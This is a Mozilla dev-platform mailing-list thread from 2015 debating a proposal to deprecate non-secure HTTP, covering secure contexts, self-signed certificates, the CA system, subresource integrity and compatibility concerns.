There's pretty broad agreement that HTTPS is the way forward for the web. In recent months, there have been statements from IETF [1], IAB [2], W3C [3], and even the US Government [4] calling for universal use of encryption, which in the case of the web means HTTPS. In order to encourage web developers to move from HTTP to HTTPS, I would like to propose establishing a deprecation plan for HTTP without security. Broadly speaking, this plan would entail limiting new features to secure contexts, followed by gradually removing legacy features from insecure contexts. Having an overall program for HTTP deprecation makes a clear statement to the web community that the time for plaintext is over -- it tells the world that the new web uses HTTPS, so if you want to use new things, you need to provide security. Martin Thomson and I drafted a one-page outline of the plan with a few more considerations here: https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9ICe-ww/edit?usp=sharing Some earlier threads on this list [5] and elsewhere [6] have discussed deprecating insecure HTTP for "powerful features". We think it would be a simpler and clearer statement to avoid the discussion of which features are "powerful" and focus on moving all features to HTTPS, powerful or not. The goal of this thread is to determine whether there is support in the Mozilla community for a plan of this general form. Developing a precise plan will require coordination with the broader web community (other browsers, web sites, etc.), and will probably happen in the W3C. Thanks, --Richard [1] https://tools.ietf.org/html/rfc7258 [2] https://www.iab.org/2014/11/14/iab-statement-on-internet-confidentiality/ [3] https://w3ctag.github.io/web-https/ [4] https://https.cio.gov/ [5] https://groups.google.com/d/topic/mozilla.dev.platform/vavZdN4tX44/discussion [6] https://groups.google.com/a/chromium.org/d/topic/blink-dev/2LXKVWYkOus/discussion
![]() |
0 |
![]() |
I think that you'll need to define a number of levels of security, and decide how to distinguish them in the Firefox GUI: - Unauthenticated/Unencrypted [http] - Unauthenticated/Encrypted [https ignoring untrusted cert warning] - DNS based auth/Encrypted [TLSA certificate hash in DNS] - Ditto with TLSA/DNSSEC - Trusted CA Authenticated [Any root CA] - EV Trusted CA [Special policy certificates] Ironically, your problem is more a GUI thing. All the security technology you need actually exists already...
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 10:40 AM, DDD <david.a.p.lloyd@gmail.com> wrote: > I think that you'll need to define a number of levels of security, and > decide how to distinguish them in the Firefox GUI: > > - Unauthenticated/Unencrypted [http] > - Unauthenticated/Encrypted [https ignoring untrusted cert warning] > - DNS based auth/Encrypted [TLSA certificate hash in DNS] > - Ditto with TLSA/DNSSEC > Note that Firefox does not presently support either DANE or DNSSEC, so we don't need to distinguish these. -Ekr > - Trusted CA Authenticated [Any root CA] > - EV Trusted CA [Special policy certificates] > > Ironically, your problem is more a GUI thing. All the security technology > you need actually exists already... > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
> > Note that Firefox does not presently support either DANE or DNSSEC, > so we don't need to distinguish these. > > -Ekr > Nor does Chrome, and look what happened to both browsers... http://www.zdnet.com/article/google-banishes-chinas-main-digital-certificate-authority-cnnic/ ....the keys to the castle are in the DNS registration process. It is illogical not to add TLSA support.
![]() |
0 |
![]() |
> In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. May I suggest defining "security" here as either: 1) A secure host (SSL) or 2) Protected by subresource integrity from a secure host This would allow website operators to securely serve static assets from non-HTTPS servers without MITM risk, and without breaking transparent caching proxies.
![]() |
0 |
![]() |
> 2) Protected by subresource integrity from a secure host > > This would allow website operators to securely serve static assets from non-HTTPS servers without MITM risk, and without breaking transparent caching proxies. Is that a complicated word for SHA512 HASH? :) You could envisage a new http URL pattern http://video.vp9?<SHA512-HASH>
![]() |
0 |
![]() |
On 13.04.2015 20:52, david.a.p.lloyd@gmail.com wrote: > >> 2) Protected by subresource integrity from a secure host >> >> This would allow website operators to securely serve static assets from non-HTTPS servers without MITM risk, and without breaking transparent caching proxies. > > Is that a complicated word for SHA512 HASH? :) You could envisage a new http URL pattern http://video.vp9?<SHA512-HASH> I suppose Subresource Integrity would be http://www.w3.org/TR/SRI/ - But, note that this will not give you extra security UI (or less warnings): Browsers will still disable scripts served over HTTP on an HTTPS page - even if the integrity matches. This is because HTTPS promises integrity, authenticity and confidentiality. SRI only provides the former.
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 3:00 PM, Frederik Braun <fbraun@mozilla.com> wrote: > On 13.04.2015 20:52, david.a.p.lloyd@gmail.com wrote: > > > >> 2) Protected by subresource integrity from a secure host > >> > >> This would allow website operators to securely serve static assets from > non-HTTPS servers without MITM risk, and without breaking transparent > caching proxies. > > > > Is that a complicated word for SHA512 HASH? :) You could envisage a new > http URL pattern http://video.vp9?<SHA512-HASH> > > I suppose Subresource Integrity would be http://www.w3.org/TR/SRI/ - > > But, note that this will not give you extra security UI (or less > warnings): Browsers will still disable scripts served over HTTP on an > HTTPS page - even if the integrity matches. > > This is because HTTPS promises integrity, authenticity and > confidentiality. SRI only provides the former. > I agree that we should probably not allow insecure HTTP resource to be looped in through SRI. There are several issues with this idea, but the one that sticks out for me is the risk of leakage from HTTPS through these http-schemed resource loads. For example, that fact that you're loading certain images might reveal which Wikipedia page you're reading. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On 13/04/15 15:57, Richard Barnes wrote: > Martin Thomson and I drafted a > one-page outline of the plan with a few more considerations here: > > https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9ICe-ww/edit?usp=sharing Are you sure "privileged contexts" is the right phrase? Surely contexts are "secure", and APIs or content is "privileged" by being only available in a secure context? There's nothing wrong with your plan, but that's partly because it's hard to disagree with your principle, and the plan is pretty high level. I think the big arguments will be over when and what features require a secure context, and how much breakage we are willing to tolerate. I know the Chrome team have a similar plan; is there any suggestion that we might coordinate on feature re-privilegings? Would we put an error on the console when a privileged API was used in an insecure context? Gerv
![]() |
0 |
![]() |
On 13/04/15 18:40, DDD wrote: > I think that you'll need to define a number of levels of security, and decide how to distinguish them in the Firefox GUI: > > - Unauthenticated/Unencrypted [http] > - Unauthenticated/Encrypted [https ignoring untrusted cert warning] > - DNS based auth/Encrypted [TLSA certificate hash in DNS] > - Ditto with TLSA/DNSSEC > - Trusted CA Authenticated [Any root CA] > - EV Trusted CA [Special policy certificates] I'm not quite sure what this has to do with the proposal you are commenting on, but I would politely ask you how many users you think are both interested in, able to understand, and willing to take decisions based on _six_ different security states in a browser? The entire point of this proposal is to reduce the web to 1 security state - "secure". Gerv
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 12:11 PM, Gervase Markham <gerv@mozilla.org> wrote: > Are you sure "privileged contexts" is the right phrase? Surely contexts > are "secure", and APIs or content is "privileged" by being only > available in a secure context? There was a long-winded group bike-shed-painting session on the public-webappsec list and this is the term they ended up with. I don't believe that it is the right term either, FWIW. > There's nothing wrong with your plan, but that's partly because it's > hard to disagree with your principle, and the plan is pretty high level. > I think the big arguments will be over when and what features require a > secure context, and how much breakage we are willing to tolerate. Not much, but maybe more than we used to. > I know the Chrome team have a similar plan; is there any suggestion that > we might coordinate on feature re-privilegings? Yes, the intent is definitely to collaborate, as the original email stated. Chrome isn't the only stakeholder, which is why we suggested that we go to the W3C so that the browser formerly known as IE and Safari are included. > Would we put an error on the console when a privileged API was used in > an insecure context? Absolutely. That's likely to be a first step once the targets have been identified. That pattern has already been established for bad crypto and a bunch of other things that we don't like but are forced to tolerate for compatibility reasons.
![]() |
0 |
![]() |
I would politely ask you how many users you think are > both interested in, able to understand, and willing to take decisions > based on _six_ different security states in a browser? I think this thread is about deprecating things and moving developers onto = more secure platforms. To do that, you'll need to tell me *why* I need to = make the effort. The only thing that I am going to care about is to get us= ers closer to that magic green bar and padlock icon. You may hope that security is black and white, but in practice it isn't. T= here is always going to be a sliding scale. Do you show me a green bar and= padlock if I go to www.google.com, but the certificate is issued by my int= ranet? Do you show me the same certificate error I'd get as if I was conne= cting to a clearly malicious certificate. What if I go to www.google.com, but the certificate has been issued incorre= ctly because Firefox ships with 500 equally trusted root certificates?=20 So - yeah, you're going to need a rating system for your security: A, B, C= , D, Fail. You're going to have to explain what situations get you into wh= at group, how as a developer I can move to a higher group (e.g. add a certi= ficate hash into DNS, get an EV certificate costing $10,000, implement DNSS= EC, use PFS ciphersuites and you get an A rating). I'm sure that there'll b= e new security vulnerabilities and best practice in future, too. Then it is up to me as a developer to decide how much effort I can realisti= cally put into this... ....for my web-site containing pictures of cats...
![]() |
0 |
![]() |
Great, peachy, more authoritarian dictation of end-user behavior by the Elite is just what the Internet needs right now. And hey, screw anybody trying to use legacy systems for anything, right? Right!
![]() |
0 |
![]() |
HTTP should remain optional and fully-functional, for the purposes of proto= typing and diagnostics. I shouldn't need to set up a TLS layer to access a = development server running on my local machine, or to debug which point bef= ore hitting the TLS layer is corrupting requests.
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 3:36:56 PM UTC-4, commod...@gmail.com wrote: > Great, peachy, more authoritarian dictation of end-user behavior by the E= lite is just what the Internet needs right now. And hey, screw anybody tryi= ng to use legacy systems for anything, right? Right! Let 'em do this. When Mozilla and Google drop HTTP support, then it'll be o= pen season for someone to fork/make a new browser with HTTP support, and ga= in an instant 30% market share. These guys have run amok with major decisio= ns (like the HTTP/2 TLS mandate) because of a lack of competition. These guys can go around thinking they're secure while trusting root CAs li= ke CNNIC whilst ignoring DNSSEC and the like; the rest of us can get back o= n track with a new, sane browser. While we're at it, we could start treatin= g self-signed certs like we do SSH, rather than as being *infinitely worse*= than HTTP (I'm surprised Mozilla doesn't demand a faxed form signed by a n= otary public to accept a self-signed cert yet. But I shouldn't give them an= y ideas ...)
![]() |
0 |
![]() |
I have given this a lot of thought lately, and to me the only way forward i= s to do exactly what is suggested here: phase out and eventually drop plain= HTTP support. There are numerous reasons for doing this: - Plain HTTP allows someone to snoop on your users. - Plain HTTP allows someone to misrepresent your content to the users. - Plain HTTP is a great vector for phishing, as well as injecting malicious= code that comes from your domain. - Plain HTTP provides no guarantees of identity to the user. Arguably, the = current HTTPS implementation doesn't do much to fix this, but more on this = below. - Lastly, arguing that HTTP is cheaper than HTTPS is going to be much harde= r once there are more providers giving away free certs (looking at StartSSL= and Let's Encrypt). My vision would be that HTTP should be marked with the same warning (except= for wording of course) as an HTTPS site secured by a self-signed cert. In = terms of security, they are more or less equivalent, so there is no reason = to treat them differently. This should be the goal. There are problems with transitioning to giving a huge scary warning for HT= TP. They include: - A large number of sites that don't support HTTPS. To fix this, I think th= e best method is to show the "http://" part of the URL in red, and publicly= announce that over the next X months Firefox is moving to the model of giv= ing a big scary warning a la self-signed cert warning if HTTPS is not enabl= ed. - A large number of corporate intranets that run plain HTTP. Perhaps a buil= d-time configuration could be enabled that would enable system administrato= rs to ignore the warning for certain subdomains or the RFC 1918 addresses a= s well as localhost. Note that carrier grade NAT in IPv4 might make the lat= ter a bad choice by default. - Ad supported sites report a drop in ad revenue when switching to HTTPS. I= don't know what the problem or solution here is, but I am certain this is = a big hurdle for some sites. - Lack of free wildcard certificates. Ideally, Let's Encrypt should provide= these. - Legacy devices that cannot be upgraded to support HTTPS or only come with= self-signed certificates. This is a problem that can be addressed by letti= ng the user bypass the scary warning (just like with self-signed certs). Finally, some people conflate the idea of a global transition from plain HT= TP to HTTPS as a move by CA's to make more money. They might argue that fir= st, we need to get rid of CA's or provide an alternative path for obtaining= certificates. I disagree. Switching from plain HTTP to HTTPS is step one. = Step two might include adding more avenues for establishing trust and authe= ntication. There is no reason to try to add additional methods of authentic= ating the servers while still allowing them to use no encryption at all. Le= t's kill off plain HTTP first, then worry about how to fix the CA system. L= et's Encrypt will of course make this a lot easier by providing free certs.
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 4:43:25 PM UTC-4, byu...@gmail.com wrote: > These guys can go around thinking they're secure while trusting root CAs = like CNNIC whilst ignoring DNSSEC and the like; the rest of us can get back= on track with a new, sane browser. While we're at it, we could start treat= ing self-signed certs like we do SSH, rather than as being *infinitely wors= e* than HTTP (I'm surprised Mozilla doesn't demand a faxed form signed by a= notary public to accept a self-signed cert yet. But I shouldn't give them = any ideas ...) A self-signed cert is worse than HTTP, in that you cannot know if the site = you are accessing is supposed to have a self-signed cert or not. If you kno= w that, you can check the fingerprint and bypass the warning. But let's say= you go to download a fresh copy of Firefox, just to find out that https://= www.mozilla.org/ is serving a self-singed cert. How can you possibly be sur= e that you are not being MITM'ed? Arguably, it's worse if we simply ignore = the fact that the cert is self-signed, and simply let you download the comp= romised version, vs giving you some type of indication that the connection = is not secure (e.g.: no green bar because it's plain HTTP). That is not to say that we should continue as is. HTTP is insecure, and sho= uld give the same warning as HTTPS with a self-signed cert.
![]() |
0 |
![]() |
On 4/13/2015 3:29 PM, stuart@testtrack4.com wrote: > HTTP should remain optional and fully-functional, for the purposes of prototyping and diagnostics. I shouldn't need to set up a TLS layer to access a development server running on my local machine, or to debug which point before hitting the TLS layer is corrupting requests. If you actually go to read the details of the proposal rather than relying only on the headline, you'd find that there is an intent to actually let you continue to use http for, e.g., localhost. The exact boundary between "secure" HTTP and "insecure" HTTP is being actively discussed in other forums. -- Joshua Cranmer Thunderbird and DXR developer Source code archæologist
![]() |
0 |
![]() |
One limiting factor is that Firefox doesn't treat form data the same on HTTPS sites. Examples: http://stackoverflow.com/questions/14420624/how-to-keep-changed-form-content-when-leaving-and-going-back-to-https-page-wor http://stackoverflow.com/questions/10511581/why-are-html-forms-sometimes-cleared-when-clicking-on-the-browser-back-button After loosing a few forum posts or wiki edits to this bug in Firefox, you quickly insist on using unsecured HTTP as often as possible.
![]() |
0 |
![]() |
On 4/13/15 5:11 PM, bryan.beicker@gmail.com wrote: > After loosing a few forum posts or wiki edits to this bug in Firefox, you quickly insist on using unsecured HTTP as often as possible. This is only done in cases in which the page explicitly requires that nothing about the page be cached (no-cache), yes? That said, we should see if we can stop doing the state-not-saving thing for SSL+no-cache and tell banks who want it to use no-store. -Boris
![]() |
0 |
![]() |
Late to the thread, but I'll use this reply to say we're very supportive of the proposal at CDT. On Mon, Apr 13, 2015 at 4:48 PM, <ipartola@gmail.com> wrote: > I have given this a lot of thought lately, and to me the only way forward= is to do exactly what is suggested here: phase out and eventually drop pla= in HTTP support. There are numerous reasons for doing this: > > - Plain HTTP allows someone to snoop on your users. > > - Plain HTTP allows someone to misrepresent your content to the users. > > - Plain HTTP is a great vector for phishing, as well as injecting malicio= us code that comes from your domain. > > - Plain HTTP provides no guarantees of identity to the user. Arguably, th= e current HTTPS implementation doesn't do much to fix this, but more on thi= s below. > > - Lastly, arguing that HTTP is cheaper than HTTPS is going to be much har= der once there are more providers giving away free certs (looking at StartS= SL and Let's Encrypt). > > My vision would be that HTTP should be marked with the same warning (exce= pt for wording of course) as an HTTPS site secured by a self-signed cert. I= n terms of security, they are more or less equivalent, so there is no reaso= n to treat them differently. This should be the goal. > > There are problems with transitioning to giving a huge scary warning for = HTTP. They include: > > - A large number of sites that don't support HTTPS. To fix this, I think = the best method is to show the "http://" part of the URL in red, and public= ly announce that over the next X months Firefox is moving to the model of g= iving a big scary warning a la self-signed cert warning if HTTPS is not ena= bled. > > - A large number of corporate intranets that run plain HTTP. Perhaps a bu= ild-time configuration could be enabled that would enable system administra= tors to ignore the warning for certain subdomains or the RFC 1918 addresses= as well as localhost. Note that carrier grade NAT in IPv4 might make the l= atter a bad choice by default. > > - Ad supported sites report a drop in ad revenue when switching to HTTPS.= I don't know what the problem or solution here is, but I am certain this i= s a big hurdle for some sites. > > - Lack of free wildcard certificates. Ideally, Let's Encrypt should provi= de these. > > - Legacy devices that cannot be upgraded to support HTTPS or only come wi= th self-signed certificates. This is a problem that can be addressed by let= ting the user bypass the scary warning (just like with self-signed certs). > > Finally, some people conflate the idea of a global transition from plain = HTTP to HTTPS as a move by CA's to make more money. They might argue that f= irst, we need to get rid of CA's or provide an alternative path for obtaini= ng certificates. I disagree. Switching from plain HTTP to HTTPS is step one= .. Step two might include adding more avenues for establishing trust and aut= hentication. There is no reason to try to add additional methods of authent= icating the servers while still allowing them to use no encryption at all. = Let's kill off plain HTTP first, then worry about how to fix the CA system.= Let's Encrypt will of course make this a lot easier by providing free cert= s. > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform --=20 Joseph Lorenzo Hall Chief Technologist Center for Democracy & Technology 1634 I ST NW STE 1100 Washington DC 20006-4011 (p) 202-407-8825 (f) 202-637-0968 joe@cdt.org PGP: https://josephhall.org/gpg-key fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
![]() |
0 |
![]() |
I fully support this proposal. In addition to APIs, I'd like to propose prohibiting caching any resources loaded over insecure HTTP, regardless of Cache-Control header, in Phase 2.N. The reasons are: 1) MITM can pollute users' HTTP cache, by modifying some JavaScript files with a long time cache control max-age. 2) It won't break any websites, just some performance penalty for them. 3) Many website operators and users avoid using HTTPS, since they believe HTTPS is much slower than plaintext HTTP. After deprecating HTTP cache, this argument will be more wrong.
![]() |
0 |
![]() |
On Mon, Apr 13, 2015 at 3:53 PM, Eugene <imfasterthanneutrino@gmail.com> wrote: > In addition to APIs, I'd like to propose prohibiting caching any resources loaded over insecure HTTP, regardless of Cache-Control header, in Phase 2.N. This has some negative consequences (if only for performance). I'd like to see changes like this properly coordinated. I'd rather just treat "caching" as one of the features for Phase 2.N.
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 7:57:58 AM UTC-7, Richard Barnes wrote: > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security= .. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it > tells the world that the new web uses HTTPS, so if you want to use new > things, you need to provide security. I'd be fully supportive of this if - and only if - at least one of the foll= owing is implemented alongside it: * Less scary warnings about self-signed certificates (i.e. treat HTTPS+self= signed like we do with HTTP now, and treat HTTP like we do with HTTPS+selfs= igned now); the fact that self-signed HTTPS is treated as less secure than = HTTP is - to put this as politely and gently as possible - a pile of bovine= manure * Support for a decentralized (blockchain-based, ala Namecoin?) certificate= authority Basically, the current CA system is - again, to put this as gently and poli= tely as possible - fucking broken. Anything that forces the world to rely = on it exclusively is not a solution, but is instead just going to make the = problem worse.
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 8:57:41 PM UTC-4, northrupt...@gmail.com wrote= : >=20 > * Less scary warnings about self-signed certificates (i.e. treat HTTPS+se= lfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+sel= fsigned now); the fact that self-signed HTTPS is treated as less secure tha= n HTTP is - to put this as politely and gently as possible - a pile of bovi= ne manure This feature (i.e. opportunistic encryption) was implemented in Firefox 37,= but unfortunately an implementation bug made HTTPS insecure too. But I gue= ss Mozilla will fix it and make this feature available in a future release. > * Support for a decentralized (blockchain-based, ala Namecoin?) certifica= te authority >=20 > Basically, the current CA system is - again, to put this as gently and po= litely as possible - fucking broken. Anything that forces the world to rel= y on it exclusively is not a solution, but is instead just going to make th= e problem worse. I don't think the current CA system is broken. The domain name registration= is also centralized, but almost every website has a hostname, rather than = using IP address, and few people complain about this.
![]() |
0 |
![]() |
Le 14 avr. 2015 =C3=A0 10:43, imfasterthanneutrino@gmail.com a =C3=A9crit = : > I don't think the current CA system is broken. The current CA system creates issues for certain categories of = population. It is broken in some ways. > The domain name registration is also centralized, but almost every = website has a hostname, rather than using IP address, and few people = complain about this. Two points: 1. You do not need to register a domain name to have a Web site (IP = address) 2. You do not need to register a domain name to run a local = blah.test.site Both are still working and not deprecated in browsers ^_^ Now the fact to have to rent your domain name ($$$) and that all the = URIs are tied to this is in terms of permanent identifiers and the = fabric of time on information has strong social consequences. But's that = another debate than the one of this thread on deprecating HTTP in favor = of HTTPS. I would love to see this discussion happening in Whistler too.=20 --=20 Karl Dubost, Mozilla http://www.la-grange.net/karl/moz
![]() |
0 |
![]() |
> * Less scary warnings about self-signed certificates (i.e. treat HTTPS+se= lfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+sel= fsigned now); the fact that self-signed HTTPS is treated as less secure tha= n HTTP is - to put this as politely and gently as possible - a pile of bovi= ne manure I am against this. Both are insecure and should be treated as such. How is = your browser supposed to know that gmail.com is intended to serve a self-si= gned cert? It's not, and it cannot possibly know it in the general case. Th= us it must be treated as insecure. > * Support for a decentralized (blockchain-based, ala Namecoin?) certifica= te authority No. Namecoin has so many other problems that it is not feasible. > Basically, the current CA system is - again, to put this as gently and po= litely as possible - fucking broken. Anything that forces the world to rel= y on it exclusively is not a solution, but is instead just going to make th= e problem worse. Agree that it's broken. The fact that any CA can issue a cert for any domai= n is stupid, always was and always will be. It's now starting to bite us. However, HTTPS and the CA system don't have to be tied together. Let's ditc= h the immediately insecure plain HTTP, then add ways to authenticate truste= d certs in HTTPS by means other than our current CA system. The two problem= s are orthogonal, and trying to solve both at once will just leave us exact= ly where we are: trying to argue for a fundamentally different system.
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 10:10:44 PM UTC-4, Karl Dubost wrote: > Now the fact to have to rent your domain name ($$$) and that all the URIs= are tied to this is in terms of permanent identifiers and the fabric of ti= me on information has strong social consequences. But's that another debate= than the one of this thread on deprecating HTTP in favor of HTTPS. The registrars are, as far as I'm concerned, where the solution to the CA p= roblem lies. You buy a domain name from someone, you are already trusting t= hem with it. They can simply redirect your nameservers elsewhere and you ca= n't do anything about it. Remember, you never buy a domain name, you lease = it. What does this have to do with plain HTTP to HTTPS transition? Well, why ar= e we trusting CA's at all? Why not have the registrar issue you a wildcard = cert with the purchase of a domain, and add restrictions to the protocol su= ch that only your registrar can issue a cert for that domain? Or even better, have the registrar sign a CA cert for you that is good for = your domain only. That way you can issue unlimited certs for domains you ow= n and *nobody but you can do that*. However, like you said that's a separate discussion. We can solve the CA pr= oblem after we solve the plain HTTP problem.
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 1:43:25 PM UTC-7, byu...@gmail.com wrote: > Let 'em do this. When Mozilla and Google drop HTTP support, then it'll be= open season for someone to fork/make a new browser with HTTP support, and = gain an instant 30% market share. Or, more likely, it'll be a chance for Microsoft and Apple to laugh all the= way to the bank. Because seriously, what else would you expect to happen w= hen the makers of a web browser announce that, starting in X months, they'l= l be phasing out compatibility with the vast majority of existing websites?
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > HTTP deprecation I'm strongly against the proposal as it is described here. I work with smal= l embedded devices (think sensor network) that are accessed over HTTP. Thes= e devices have very little memory, only a few kB, implementing SSL is simpl= y not possible. Who are you to decree these devices become unfit hosts? Secondly the proposal to restrain unrelated new features like CSS attribute= s to HTTPS sites only is simply a form of strong-arming. Favoring HTTPS is = fine but authoritarianism is not. Please consider that everyone is capable = of making their own decisions. Lastly deprecating HTTP in the current state of the certificate authority b= usiness is completely unacceptable. These are *not* separate issues, to imp= lement HTTPS without warnings you must be able to obtain certificates (incl= uding wildcard ones) easily and affordably and not only to rich western cou= ntry citizens. The "let's go ahead and we'll figure this out later" attitud= e is irresponsible considering the huge impact that this change will have. I would view this proposal favorably if 1) you didn't try to force people t= o adopt the One True Way and 2) the CA situation was fixed.
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 12:27:22 AM UTC-4, commod...@gmail.com wrote: > On Monday, April 13, 2015 at 1:43:25 PM UTC-7, byu...@gmail.com wrote: > > Let 'em do this. When Mozilla and Google drop HTTP support, then it'll = be open season for someone to fork/make a new browser with HTTP support, an= d gain an instant 30% market share. > Or, more likely, it'll be a chance for Microsoft and Apple to laugh all t= he way to the bank. Because seriously, what else would you expect to happen= when the makers of a web browser announce that, starting in X months, they= 'll be phasing out compatibility with the vast majority of existing website= s? This isn't at all what Richard was trying to say. The original discussion s= tates that the plan will be to make all new browser features only work unde= r HTTPS, to help developers and website owners to migrate to HTTPS only. Th= is does mean these browsers will remove support for HTTP ever; but simply t= o deprecate it. Browsers still support many legacy and deprecated features.
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 1:16:25 AM UTC-4, vic wrote: > On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > > HTTP deprecation >=20 > I'm strongly against the proposal as it is described here. I work with sm= all embedded devices (think sensor network) that are accessed over HTTP. Th= ese devices have very little memory, only a few kB, implementing SSL is sim= ply not possible. Who are you to decree these devices become unfit hosts? >=20 > Secondly the proposal to restrain unrelated new features like CSS attribu= tes to HTTPS sites only is simply a form of strong-arming. Favoring HTTPS i= s fine but authoritarianism is not. Please consider that everyone is capabl= e of making their own decisions. >=20 > Lastly deprecating HTTP in the current state of the certificate authority= business is completely unacceptable. These are *not* separate issues, to i= mplement HTTPS without warnings you must be able to obtain certificates (in= cluding wildcard ones) easily and affordably and not only to rich western c= ountry citizens. The "let's go ahead and we'll figure this out later" attit= ude is irresponsible considering the huge impact that this change will have= .. >=20 > I would view this proposal favorably if 1) you didn't try to force people= to adopt the One True Way and 2) the CA situation was fixed. An embedded device would not be using a web browser such as Firefox, so thi= s isn't really much of a concern. The idea would be to only enforce HTTPS d= eprecation from browsers, not web servers. You can continue to use HTTP on = your own web services and therefore use it through your embedded devices. As all technology protocols change over time, enforcing encryption is a nat= ural and logical step to evolve web technology. Additionally, while everyon= e is able to make their own decisions, it doesn't mean people make the righ= t choice. A website that uses sensitive data insecurely over HTTP and the u= sers are unaware, as most web consumers are not even aware what the differe= nce of HTTP vs HTTPS means, is not worth the risk. It'd be better to enforc= e security and reduce the risks that exist with internet privacy. Mozilla t= hough never truly tries to operate anything with an authoritarianism approa= ch, but this suggestion is to protect the consumers of the web, not the dev= elopers of the web. Mozilla is trying to get https://letsencrypt.org/ started, which will be fr= ee, removing all price arguments from this discussion. IMHO, this debate should be focused on improving the way HTTP is deprecated= , but I do not believe there are any valid concerns that HTTP should not be= deprecated.
![]() |
0 |
![]() |
IMO, limiting new features to HTTPS only, when there's no real security reason behind it will only end up limiting feature adoption. It directly "punishing" developers and adds friction to using new features, but only influence business in a very indirect manner. If we want to move more people to HTTPS, we can do any or all of the following: * Show user warnings when the site they're on is insecure * Provide an opt-in "don't display HTTPS" mode as an integral part of the browser. Make it extremely easy to opt in. Search engines can also: * Downgrade ranking of insecure sites in a significant way * Provide a "don't show me insecure results" button If you're limiting features to HTTPS with no reason you're implicitly saying that developer laziness is what's stalling adoption. I don't believe that the case. There's a real eco-system problem with 3rd party widgets and ad networks that makes it hard for large sites to switch until all of their site's widgets have. Developers have no saying here. Business does. What you want is to make the business folks threaten that out-dated 3rd party widget that if it doesn't move to HTTPS, the site would switch to the competition. For that you need to use a stick that business folks understand: "If you're on HTTP, you'd see less and less traffic". Limiting new features does absolutely nothing in that aspect.
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 7:52 AM, Yoav Weiss <yoav@yoav.ws> wrote: > Limiting new features does absolutely nothing in that aspect. Hyperbole much? CTO of the New York Times cited HTTP/2 and Service Workers as a reason to start deploying HTTPS: http://open.blogs.nytimes.com/2014/11/13/embracing-https/ (And anecdotally, I find it easier to convince developers to deploy HTTPS on the basis of some feature needing it than on merit. And it makes sense, if they need their service to do X, they'll go through the extra trouble to do Y to get to X.) -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 4:10 AM, Karl Dubost <kdubost@mozilla.com> wrote: > 1. You do not need to register a domain name to have a Web site (IP address) Name one site you visit regularly that doesn't have a domain name. And even then, you can get certificates for public IP addresses. > 2. You do not need to register a domain name to run a local blah.test.site We should definitely allow whitelisting of sorts for developers. As a start localhost will be a privileged context by default. We also have an override in place for Service Workers. This is not a reason not to do HTTPS. This is something we need to improve along the way. -- https://annevankesteren.nl/
![]() |
0 |
![]() |
> Secondly the proposal to restrain unrelated new features like CSS attribu= tes to HTTPS sites only is simply a form of strong-arming. Favoring HTTPS i= s fine but authoritarianism is not. Please consider that everyone is capabl= e of making their own decisions.=20 One might note that this has already been tried, *and succeeded*, with SPDY= and then HTTP 2. HTTP 2 is faster than HTTP 1, but both Mozilla and Google are refusing to a= llow unencrypted HTTP 2 connections. Sites like http://httpvshttps.com/ int= entionally mislead users into thinking that TLS improves connection speed, = when actually the increased speed is from HTTP 2.
![]() |
0 |
![]() |
> The goal of this thread is to determine whether there is support in the > Mozilla community for a plan of this general form. Developing a precise > plan will require coordination with the broader web community (other > browsers, web sites, etc.), and will probably happen in the W3C. >=20 From the user/sysadmin point of view it would be very helpful to have infor= mation on how the following issues will be handled: 1) Caching proxies: resources obtained over HTTPS cannot be cached by a pro= xy that doesn't use MITM certificates. If all users must move to HTTPS ther= e will be no way to re-use content downloaded for one user to accelerate an= other user. This is an important issue for locations with many users and po= or internet connectivity.=20 2) Self signed certificates: in many situations it is hard/impossible to ge= t certificates signed by a CA (e.g. provisioning embedded devices). The cur= rent approach in many of these situations is not to use HTTPS. If the plan = goes into effect what other solution could be used? Regarding problem 1: I guess that allowing HTTP for resources loaded with s= ubresource integrity could be some sort of alternative, but would require c= ollaboration from the server owner. Being more work than simply letting the= webserver send out automatically caching headers I wonder how many sites w= ill implement it. Regarding problem 2: in my opinion it can be mitigated by offering the user= a new standard way to validate self-signed certificates: the user is promp= ted to enter the fingerprint of the certificate that she must have received= out-of-band, if the user enters the correct fingerprint the certificate is= marked as trusted (see [1]). This clearly opens up some attacks that shoul= d be carefully assessed. Best, Lorenzo [1] https://bugzilla.mozilla.org/show_bug.cgi?id=3D1012879
![]() |
0 |
![]() |
